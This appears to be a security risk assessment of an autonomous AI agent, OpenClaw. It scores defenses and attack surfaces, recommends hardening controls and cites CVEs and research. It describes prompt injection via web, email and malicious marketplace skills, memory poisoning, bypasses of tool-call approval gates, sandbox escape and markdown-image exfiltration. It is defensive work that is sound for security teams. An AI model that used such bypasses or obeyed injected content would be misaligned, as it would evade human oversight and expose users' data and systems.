1 Risk Scores
Five headline metrics from the AIRQ methodology. The first two place the agent on the quadrant; the remaining three describe how much defense is actually in place.
Compromise Score: 9.2 / 10. Among the easiest agents in the set to compromise. Multiple well-documented attack paths, confirmed zero-click vectors, and several published CVEs.
Ability to Inflict Real Harm: 10 / 10. Maximum. Shell, network, credentials, file system, and autonomous action are all available, and nothing meaningfully contains the blast radius.
Total Defense Score: 0 / 15. No defensive controls across any of the five defense categories.
Verified Defense: 0 / 9. All three high-confidence defense categories are absent — a confirmed architectural state, not a research gap.
Security-Adjusted Capability: 3.52. OpenClaw's wide capability footprint cannot offset zero defense and very high compromise exposure, placing it near the bottom of the ranking.
2 Defense Components
Five mutually exclusive, collectively exhaustive (MECE) categories (Input → Processing → Action → Output → Detection), each scored 0–3. OpenClaw scores zero across all five.
Input Guardrails: 0 / 3. Nothing filters untrusted content before it reaches the agent. Any webpage, email, chat message, or marketplace skill can deliver prompt injection straight into the reasoning loop.
Execution Isolation: 0 / 3. The agent runs in-process with user-level privileges, unrestricted network, and full file system access. No sandbox, container, or network allowlist is enabled by default.
Action Controls: 0 / 3. Tool calls execute without approval gates or a permission model. The agent can send, publish, deploy, or purchase on the user's behalf with no interruption point.
Output Guardrails: 0 / 3. Outputs flow through markdown, image, and URL rendering unchecked, leaving every documented exfiltration channel open.
Monitoring & Audit: 0 / 3. No structured logging, no audit trail, and no compliance certification. Incidents are effectively invisible until they produce visible second-order damage.
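The arithmetic behind the 0 / 15 total can be sketched as follows, assuming the Total Defense Score is the plain sum of the five 0–3 category scores (the text implies this but does not state the formula). The function name is illustrative and not part of the AIRQ methodology.

```python
# Category scores as listed above; each is on a 0-3 scale.
DEFENSE_SCORES = {
    "Input Guardrails": 0,
    "Execution Isolation": 0,
    "Action Controls": 0,
    "Output Guardrails": 0,
    "Monitoring & Audit": 0,
}
MAX_PER_CATEGORY = 3


def total_defense(scores: dict[str, int]) -> tuple[int, int]:
    """Return (achieved, maximum) for a set of 0-3 category scores.

    Assumption: the total is an unweighted sum of the categories.
    """
    for name, value in scores.items():
        if not 0 <= value <= MAX_PER_CATEGORY:
            raise ValueError(f"{name}: score {value} is outside 0-{MAX_PER_CATEGORY}")
    return sum(scores.values()), MAX_PER_CATEGORY * len(scores)


achieved, maximum = total_defense(DEFENSE_SCORES)
print(f"Total Defense Score: {achieved} / {maximum}")
```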
3 Attack Surface Exposure
Ten surfaces scored 0–4 each. Eight of ten score 3 or higher; seven are at the architectural maximum.
User Input: 4 / 4. Direct prompt injection is trivially effective. No input validation, no separation between the user's intent and adversarial content.
External Data: 4 / 4. Ingests content from web pages, email, 20+ messaging platforms, local files, and the skills marketplace. Every channel is an attacker-controlled input path.
Memory: 4 / 4. Persistent cross-session memory with no integrity verification. One successful poisoning persists into every future conversation.
Reasoning: 2 / 4. Moderate exposure. Goal manipulation is a theoretical risk, but adversaries rarely need to attack the reasoning layer when the input channel itself is open.
Planning: 2 / 4. Task decomposition is exploitable, but damaging outcomes arrive through tool execution before planning subtleties matter.
Tool Execution: 4 / 4. Full shell, code execution, API calls, and credential access within scope. The surface that converts any compromise into concrete harm.
Orchestration: 4 / 4. Autonomous multi-step chains with no interruption points — compromise at any step propagates unimpeded.
Inter-Agent: 3 / 4. Weak trust model between cooperating agents creates meaningful cascade risk, though it is not the lead attack vector today.
Output Processing: 4 / 4. Markdown, image URLs, and unsanitized redirects give attackers several exfiltration channels for sensitive context.
Configuration: 4 / 4. The plugin and skills supply chain is the most mature attack path — 820+ malicious skills have already been documented in the marketplace.
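A short tally makes it easy to check summary counts against the ten surface scores listed above. The dictionary copies those scores; the variable names are illustrative.

```python
# Surface scores as listed above; each is on a 0-4 scale.
SURFACE_SCORES = {
    "User Input": 4,
    "External Data": 4,
    "Memory": 4,
    "Reasoning": 2,
    "Planning": 2,
    "Tool Execution": 4,
    "Orchestration": 4,
    "Inter-Agent": 3,
    "Output Processing": 4,
    "Configuration": 4,
}
MAX_SCORE = 4

# Surfaces scoring 3 or higher, and surfaces at the scale maximum.
high_exposure = [name for name, score in SURFACE_SCORES.items() if score >= 3]
at_maximum = [name for name, score in SURFACE_SCORES.items() if score == MAX_SCORE]

print(f"{len(high_exposure)} of {len(SURFACE_SCORES)} surfaces score 3 or higher")
print(f"{len(at_maximum)} surfaces are at the maximum: {', '.join(at_maximum)}")
```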
4 Detailed Assessment
Agent properties mapped against best-in-class reference agents from the same cohort.
| Dimension | OpenClaw | Best-in-class reference |
|---|---|---|
| Untrusted input surfaces | Web, email, messages, files, 20+ messaging platforms, browser, shell, marketplace skills | Code-completion tools with no web or messaging ingress |
| Tool capabilities | Full shell, browser, file system, 20+ messaging platforms, email, 24/7 daemon, marketplace skills | Scoped tool access with explicit capability declarations |
| Human-in-the-loop | None; fully autonomous 24/7 daemon | Claude Code: 3-level permission model with deny accumulation |
| Sandboxing & isolation | None; 30K+ exposed instances; no network isolation; no file scoping; no credential management | Claude Code: Seatbelt + Bubblewrap + domain allowlist. Codex CLI: Landlock + network blocked. |
| Known CVEs & incidents | 10+ CVEs; 820+ malicious marketplace skills; mass exploitation documented; zero-click vectors confirmed | Cohort agents with zero published CVEs and independent adversarial testing |
| Compliance posture | None | Ada AI (AIUC-1, SOC 2); Moveworks (FedRAMP); Augment Code (SOC 2, ISO 42001) |
Lethal Trifecta
Yes: all three.
The Lethal Trifecta (Simon Willison) applies when an agent combines exposure to untrusted input, access to sensitive data, and the ability to communicate externally. OpenClaw meets all three conditions: it ingests untrusted content from web, email, and marketplace skills; accesses user files, credentials, and messaging platforms; and can send outbound traffic without restriction.
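The trifecta test is a conjunction of three properties, which a minimal sketch can make explicit. The class and field names are hypothetical and chosen only for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentProfile:
    """Hypothetical record of the three trifecta conditions for one agent."""
    untrusted_input: bool         # ingests attacker-controllable content
    sensitive_data_access: bool   # can read files, credentials, messages
    external_communication: bool  # can send data out of the environment


def has_lethal_trifecta(profile: AgentProfile) -> bool:
    """True only when all three conditions hold at once."""
    return (
        profile.untrusted_input
        and profile.sensitive_data_access
        and profile.external_communication
    )


openclaw = AgentProfile(
    untrusted_input=True,
    sensitive_data_access=True,
    external_communication=True,
)
print(has_lethal_trifecta(openclaw))
```

Removing any one of the three conditions makes the check fail. Network blocking, for example, targets the third condition.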
5 Hardening Recommendations
If OpenClaw is deployed in an enterprise environment, these controls map to the five defense components. None of them restores the agent to acceptable risk; they only reduce the blast radius.
Input (Input Guardrails)
- Disable the skills marketplace entirely; allowlist only internally audited skills. This treats the 820+ documented malicious skills as the baseline threat model rather than an edge case.
- Strip or quarantine HTML, markdown, and embedded content from any ingested email, chat message, or web page before it reaches the agent context.
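The two input controls above could be prototyped roughly as follows. This is a sketch under stated assumptions: the allowlist is keyed by the SHA-256 digest of a skill package (one possible way to pin audited skills, not an OpenClaw feature), and markup is reduced to plain text with the standard-library HTML parser. Stripping markup removes hidden carriers such as comments and script blocks, but it does not neutralize injection written as ordinary visible text.

```python
import hashlib
from html.parser import HTMLParser

# Hypothetical allowlist: SHA-256 digests of skill packages that passed internal audit.
AUDITED_SKILL_DIGESTS: set[str] = set()


def skill_is_allowed(package_bytes: bytes) -> bool:
    """Allow a skill only if its exact bytes match an audited digest."""
    return hashlib.sha256(package_bytes).hexdigest() in AUDITED_SKILL_DIGESTS


class _TextOnly(HTMLParser):
    """Collect text nodes; drop tags, attributes, comments, scripts, and styles."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self._skip_depth = 0
        self.parts: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.parts.append(data)


def strip_html(raw: str) -> str:
    """Return the visible text of an HTML fragment with whitespace collapsed."""
    parser = _TextOnly()
    parser.feed(raw)
    parser.close()
    return " ".join(" ".join(parser.parts).split())


print(strip_html("<p>Hello <b>world</b></p><script>alert(1)</script>"))
```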
Isolation (Execution Isolation)
- Run OpenClaw inside a rootless container or Bubblewrap sandbox with network blocked by default and an explicit domain allowlist.
- Scope file system access to a dedicated working directory; remove access to home directory, credential stores, and SSH keys.
- Run under a dedicated OS user with no sudo rights and no access to user credentials, tokens, or browser profiles.
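As an illustration of the isolation controls above, the sketch below builds a Bubblewrap command line that unshares all namespaces (including network) and exposes only a dedicated working directory as writable. The `openclaw` command name and the `/srv/agent` path are placeholders, and the bind layout assumes a merged-`/usr` Linux distribution. Bubblewrap itself blocks the network entirely; a domain allowlist would need a separate egress proxy, which is not shown.

```python
import shlex
from pathlib import Path


def bwrap_argv(workdir: Path, agent_cmd: list[str]) -> list[str]:
    """Build a bwrap invocation with no network and one writable directory."""
    return [
        "bwrap",
        "--unshare-all",        # new namespaces, including network: no connectivity
        "--die-with-parent",    # kill the sandbox if the launcher exits
        "--clearenv",           # do not inherit tokens from the caller's environment
        "--ro-bind", "/usr", "/usr",
        "--symlink", "usr/bin", "/bin",
        "--symlink", "usr/lib", "/lib",
        "--proc", "/proc",
        "--dev", "/dev",
        "--tmpfs", "/tmp",
        "--bind", str(workdir), "/work",  # the only writable host path
        "--chdir", "/work",
        "--setenv", "HOME", "/work",      # home directory is not mounted
        "--setenv", "PATH", "/usr/bin",
        *agent_cmd,
    ]


# Placeholder path and command name; adjust to the actual deployment.
argv = bwrap_argv(Path("/srv/agent"), ["openclaw"])
print(shlex.join(argv))
```

Because the home directory, credential stores, and SSH keys are never bound into the sandbox, they are absent from the agent's view rather than merely permission-protected.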
Action (Action Controls)
- Introduce an approval-gate proxy for any tool call matching shell execution, file write outside the working directory, or outbound network to a non-allowlisted domain.
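The decision logic of such an approval gate might look like the sketch below. The `ToolCall` shape and its `kind` labels are hypothetical, since the actual tool-call format is not described here. Failing closed on unknown call kinds is a design choice of this sketch, not something the recommendation specifies.

```python
from dataclasses import dataclass
from pathlib import Path
from urllib.parse import urlsplit


@dataclass
class ToolCall:
    kind: str         # hypothetical labels: "shell", "file_write", "http"
    target: str = ""  # command, path, or URL depending on kind


@dataclass
class GatePolicy:
    workdir: Path
    allowed_domains: frozenset[str] = frozenset()


def needs_approval(call: ToolCall, policy: GatePolicy) -> bool:
    """Return True when a human must approve the call before it runs."""
    if call.kind == "shell":
        return True  # every shell execution is gated
    if call.kind == "file_write":
        # Resolve ".." and symlinks before comparing against the working directory.
        resolved = (policy.workdir / call.target).resolve()
        return not resolved.is_relative_to(policy.workdir.resolve())
    if call.kind == "http":
        host = (urlsplit(call.target).hostname or "").lower()
        return host not in policy.allowed_domains
    return True  # unknown kinds fail closed


policy = GatePolicy(Path("/srv/agent"), frozenset({"api.internal.example"}))
print(needs_approval(ToolCall("file_write", "../etc/passwd"), policy))
```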
Output (Output Guardrails)
- Disable markdown image rendering and URL auto-fetch in any interface consuming OpenClaw output. This closes the primary documented exfiltration channels.
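Where the rendering interface cannot be reconfigured, agent output can be filtered before display. The sketch below replaces inline markdown images and raw `<img>` tags with inert placeholders so that no URL is fetched automatically. It is a minimal illustration with hypothetical names; reference-style images (`![alt][ref]`) and other auto-fetching elements are not covered.

```python
import re

# Inline image syntax: ![alt](url) and ![alt](url "title").
_MD_IMAGE = re.compile(r"!\[([^\]]*)\]\([^)]*\)")
# Raw <img ...> tags that a markdown renderer may pass through as HTML.
_HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def neutralize_images(text: str) -> str:
    """Replace image references with placeholders, keeping only the alt text."""
    text = _MD_IMAGE.sub(lambda m: f"[image removed: {m.group(1)}]", text)
    return _HTML_IMG.sub("[image removed]", text)


print(neutralize_images("See ![chart](https://evil.example/p.png?d=SECRET) now"))
```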
Detection (Monitoring & Audit)
- Log all tool calls, shell commands, and outbound network connections; alert on the known indicators of compromise from the 10+ published CVEs and the ClawHavoc malicious-skill set.
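A structured audit record for each tool call could be emitted as one JSON object per line, which most log pipelines can ingest and alert on. The field names and logger name below are assumptions made for illustration; matching against specific indicators of compromise is left out because those indicators are not listed here.

```python
import json
import logging
import time

# Hypothetical logger name; route it to an append-only sink in practice.
audit = logging.getLogger("agent.audit")


def log_tool_call(tool: str, arguments: dict, outcome: str) -> str:
    """Emit one JSON line describing a tool call and return that line."""
    record = {
        "ts": time.time(),     # Unix timestamp of the call
        "event": "tool_call",
        "tool": tool,
        "arguments": arguments,
        "outcome": outcome,    # e.g. "allowed", "denied", "pending_approval"
    }
    # default=str keeps the logger from failing on non-JSON-serializable arguments.
    line = json.dumps(record, sort_keys=True, default=str)
    audit.info(line)
    return line


logging.basicConfig(level=logging.INFO, format="%(message)s")
log_tool_call("shell", {"cmd": "ls -la"}, "pending_approval")
```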
Even with all of the above in place, OpenClaw's base architecture (persistent memory without integrity verification, unrestricted orchestration chains) keeps it in the upper half of the compromise-score range. For environments with sensitive data, the recommendation remains non-deployment.
6 Threat Intelligence
Published vulnerabilities, security research, and active exploitation evidence informing the compromise and defense scores above.
CVEs and Advisories
- CVE-2026-25253 — ClawBleed RCE (CVSS 8.8). Remote code execution via crafted skill manifest. An attacker-controlled skill can execute arbitrary code on the host system during installation.
- CVE-2026-32922 — Privilege Escalation (CVSS 9.9). Local escalation to root via daemon misconfiguration. The 24/7 daemon process runs with insufficient privilege separation, allowing a compromised agent to gain root access.
- CVE-2026-29607 / CVE-2026-28460 — Approval Bypass. Tool-call approval checks are bypassed under specific plugin states. Agents can execute privileged actions without triggering the intended confirmation gates.
- CVE-2026-26322 — Server-Side Request Forgery (CVSS 7.6). SSRF via browser-tool URL handling. The agent's browser module can be directed to make requests to internal network resources.
- CVE-2026-34426 — Approval Bypass via Environment Variables. Approval gates are bypassed when specific environment variables are set, enabling silent execution of restricted tool calls.
- jgamblin/OpenClawCVEs — community-maintained CVE tracker cataloguing 156 advisories to date.
Published Research
- The Hacker News — OpenClaw bug enables one-click remote exploitation. Walkthrough of the zero-click attack chain from crafted webpage to full shell access.
- Kaspersky — OpenClaw vulnerabilities exposed. Analysis of the agent's attack surface from an endpoint-security perspective.
- CrowdStrike — What security teams need to know about the OpenClaw AI super-agent. Enterprise threat assessment and detection guidance.
- Cisco — Personal AI agents like OpenClaw are a security nightmare. Network-level risks when autonomous agents operate on corporate infrastructure.
- Snyk — ToxicSkills: malicious AI agent skills on ClawHub. Supply-chain analysis of 820+ malicious skills in the public marketplace.
- Oasis Security — ClawJacked research on session hijacking. Demonstrates how an attacker can take over active agent sessions through crafted inter-agent messages.
- Wiz / ARMO — Analysis of sandbox escape via sessions_spawn. Documents how the agent's session management API can be exploited to break out of any applied container isolation.
- ClawHavoc — 341+ documented malicious skills in the public marketplace. The most comprehensive catalogue of supply-chain attacks targeting the OpenClaw ecosystem.